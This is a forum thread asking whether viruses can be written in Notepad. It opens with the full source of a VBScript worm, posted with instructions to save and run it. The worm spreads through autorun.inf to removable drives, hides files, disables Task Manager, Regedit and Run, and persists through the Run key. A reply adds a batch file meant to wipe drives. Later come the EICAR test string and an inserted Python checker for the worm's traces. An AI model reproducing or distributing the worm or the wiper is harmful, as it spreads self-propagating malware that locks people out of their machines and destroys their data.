can we really make a virus on notepad?

hi, got this on indonesian forum (and it’s in indonesian language too) :
the instruction is : just copy-paste this code to “notepad” and “save as”

'//–Start of the code: set it so that when an error occurs it is ignored and the virus carries on–//
on error resume next

'//–Dim the following names–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,sial,nt,check,sd

‘//–Set the text that will later be written as the Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe 51AL.doc.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy itself to become the parent file in the Windows path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\51AL.doc.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\51AL.doc.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\51AL.doc.vbs “)
tf.attributes = 39

‘//–Create Autorun.inf to run the virus automatically whenever a flash disk is plugged in–//
‘Spreads to every drive of type 1 and 2 (removable), including floppy disks
for each flashdrive in fs.drives
‘//–Check the drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Create the infector if the drive type turns out to be 1 or 2. Or A:\–//
set tf=fs.getfile(flashdrive.path &”\51AL.doc.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\51AL.doc.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\51AL.doc.vbs “)
tf.attributes = 39

‘//–Create the Autorun.inf whose text was prepared earlier (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Registry manipulation–//
set sial = createobject(”WScript.Shell”)
‘//–Manip - Change the Internet Explorer CAPTION to THE EMperOR of 51AL//
sial.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE EMperOR of 51AL “

‘//–Manip – Set hidden files not to be shown in Explorer–//
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,
“0″, “REG_DWORD”

‘//–Manip – Remove the Find, Folder Options and Run menus, and block Regedit and Task Manager–//
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
“1″, “REG_DWORD”
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,
“1″, “REG_DWORD”
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable right-click–//
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,
“1″, “REG_DWORD”

‘//–Manip - Show a message at every Windows startup–//
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“THE EMperOR of 51AL.”
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“51AL datang…51AL lihat…51AL menang!!!”

‘//–Manip – Active at every Windows startup–//
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\51AL.doc.vbs “

‘//–Manip – Change RegisteredOwner and Organization–//
sial.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Emperor”
sial.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”51AL”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘End of the code

??? ??? ??? ??? ??? can it be done? this is scary.

Ganda
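
The traces the script above would leave (an autorun.inf that launches a script, a document-looking name with a script extension, the policy values set to 1, a script in the Run key) can be checked for offline. The Python below is an added example, not code from the thread; the function names and extension lists are assumptions, and the sample values are constructed from strings in the post.

```python
import re

# Value names the posted script sets to 1 under ...\Policies\ (taken from the post).
POLICY_VALUES = {"nofind", "nofolderoptions", "norun", "noviewcontextmenu",
                 "disableregistrytools", "disabletaskmgr"}
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")
# Document-looking name that really ends in a script extension, e.g. "x.doc.vbs".
DOUBLE_EXT = re.compile(r"\.(docx?|pdf|txt|jpe?g|xls)\.(vbs|vbe|js|wsf|bat|cmd)\b", re.I)


def check_autorun(text):
    """Return findings for the contents of one autorun.inf file."""
    findings, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "autorun" or "=" not in line or line.startswith(";"):
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() not in ("open", "shellexecute"):
            continue
        tokens = value.lower().replace('"', " ").split()
        if any("wscript" in t or "cscript" in t or t.endswith(SCRIPT_EXT) for t in tokens):
            findings.append(f"autorun {key} launches a script: {value}")
        if DOUBLE_EXT.search(value):
            findings.append(f"double extension in autorun target: {value}")
    return findings


def check_registry(values):
    """values maps 'key path\\value name' to its data (e.g. parsed from a .reg export)."""
    findings = []
    for path, data in values.items():
        low, name = path.lower(), path.rsplit("\\", 1)[-1]
        target = str(data).strip()
        if "\\policies\\" in low and name.lower() in POLICY_VALUES and target == "1":
            findings.append(f"policy lockout: {name}=1")
        if "\\currentversion\\run\\" in low and target.lower().endswith(SCRIPT_EXT):
            findings.append(f"script in Run key: {name} -> {target}")
    return findings


if __name__ == "__main__":
    # Constructed sample input; the autorun text is the string the posted script writes.
    print(check_autorun("[autorun]\r\nshellexecute=wscript.exe 51AL.doc.vbs"))
    print(check_registry({
        r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr": "1",
        r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir": r"C:\Windows\51AL.doc.vbs",
    }))
```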

And this is supposed to do what ?
thanks a lot for the great documentation …

i don’t know. the instruction is :
“if you wanna create a virus on notepad, it’s easy. just copy-paste this code (don’t forget to activate your AV, AVG can detect it, but McAfee didn’t)”.

and followed by the code… bla bla bla bla,

and last, “save as this code and name it something.vbs” (i forgot the exact name).

the actual code is too long, i think it’s automatically cut off in this post.

i think the code should b in English if ur OS is in English.

since the code is in Indonesian, I suppose the writer aims at Indonesian OS version or at least the OS which got installed Bahasa Indonesian.

I'm blind in programming so just my 2c.

can we really make a virus on notepad?

Yep we can :P.
The easiest one is this one.

@echo off

DEL C: -Y
DEL D: -Y

Save this as ‘whateveryouwant’.bat

As you can see it just deletes your hard drive, it can be made more difficult etc so you can’t see it, and it can be attached to things etc but I’m not going to say more 'cause they’re going to think that I made that latest virus :wink: lol.
This is all I know of batmaking :-.

Hope I didn’t scare you too much lol
Xan

Hello,

Yes it is possible to create simple viruses in notepad or any text editor for that matter.

Justin

wow! i didn’t know that before. i’m not a techie but i’m really interested in virus/av programming, i’ve bought books about virus & antivirus programming, (haven’t read it yet), but they’re all about visual basic virus/AV programming.

WOW!!! i AM afraid.

and can this “simple text editor virus” be removed by our AV? or it’s classified as new virus (zero day)?

That is not a virus, it’s just a nasty bat-file .
also, the original example is actually a .vbs-script and you can write those
in any text-editor…but just because it does something nasty doesn’t necessarily make it a virus .

here’s a .txt “virus” …
(it doesn’t DO anything, read about it here : http://www.eicar.org/anti_virus_test_file.htm)

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

SCARIER!! if we can really attach it to another file, make it invisible, and it’s not categorized as a virus (AV can’t detect it) it freaks me!

Important note: EICAR cannot be held responsible when these files or your AV scanner in combination with these files cause any damage to your computer. YOU DOWNLOAD THESE FILES AT YOUR OWN RISK. Download these files only if you are sufficiently secure in the usage of your AV scanner. EICAR cannot and will not provide any help to remove these files from your computer. Please contact the manufacturer/vendor of your AV scanner to seek such help.

that scares me too ;D

Ganda

can it be done? this is scary.
WOW!!! i AM afraid.
SCARIER!! if we can really attach it to another file, make it invisible, and it's not categorized as a virus (AV can't detect it) it freaks me!
that scares me too

LOL looks like you’re ‘scaried’ :wink: :wink: :wink: ;D ;D ;D

LOL ;D ;D ;D

to the moderators :
could you please fix the board-software so it doesn’t mess with the formatting
of text that is in “code”-format ? f.ex you can not use the “@” symbol (see my point?)

Good that people are afraid … makes it easier for the AV-manufacturers to get
to your hard-earned cash …
The number one reason for virus-infections is still people double-clicking on
executable files originating from an evil source and/or using a m$ OS with the default settings .

Well, some of us did change it so you can use the at symbol, but I think the admins wanted to leave it this way to help prevent spambots from harvesting emails in the forum.

I think he means skipping that only for text within “code” BB tags, while leave it working otherwise.

I see. I would also like that, but I don’t know if even the admins can control that due to the SMF being maintained by another party. We can only hope (that and a slew of other forum requests) :THNK

Edit: I see that someone actually thought of a workaround to generate the [at-bypass] symbol :): you have to type [at-bypass ] → ignore the last space in there; it was put there ∴ the [at-bypass] wouldn’t be generated.

so…? how about the “text file virus”? can AV detect it?

Depends on the AV, but I’ve personally tried it before with just one line of text; the AV’s heuristics that I used at the time thought it was a real virus. 88)

and you set your AV heuristic on what level (high, low, middle?)

maximum everything

then i’ll do it too (:TNG). thx soya